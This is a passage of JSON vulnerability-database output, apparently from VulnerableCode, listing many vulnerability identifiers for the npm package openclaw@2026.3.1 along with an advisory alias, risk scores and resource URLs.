"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-x82f-27x3-q89c"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zm2t-r33r-fffy"}],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}